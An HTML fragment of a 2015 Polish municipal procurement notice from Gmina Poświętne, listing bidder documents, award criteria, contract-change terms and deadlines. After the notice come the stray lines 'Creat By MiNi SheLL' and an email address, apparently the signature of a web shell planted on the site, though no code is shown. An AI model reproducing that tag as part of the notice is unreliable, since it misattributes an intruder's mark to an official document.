<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin płatności - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany w umowie:
- w zakresie określonego w umowie wynagrodzenia brutto, w przypadku zmiany obowiązujących przepisów dotyczących podatku od towarów i usług.
- zmiana umowy na skutek zmiany formy organizacyjno-prawnej, przekształcenia  lub połączenia Wykonawcy,
- zmiana danych teleadresowych  Zamawiającego lub Wykonawcy
Zmiana umowy może nastąpić jedynie w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.ug.poswietne.wrotapodlasia.pl/przet/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Poświętne, 18-112 Poświętne 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2015 godzina 09:00, miejsce: Urząd Gminy Poświętne, 18-112 Poświętne 21, pokój nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 18.12.2015.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com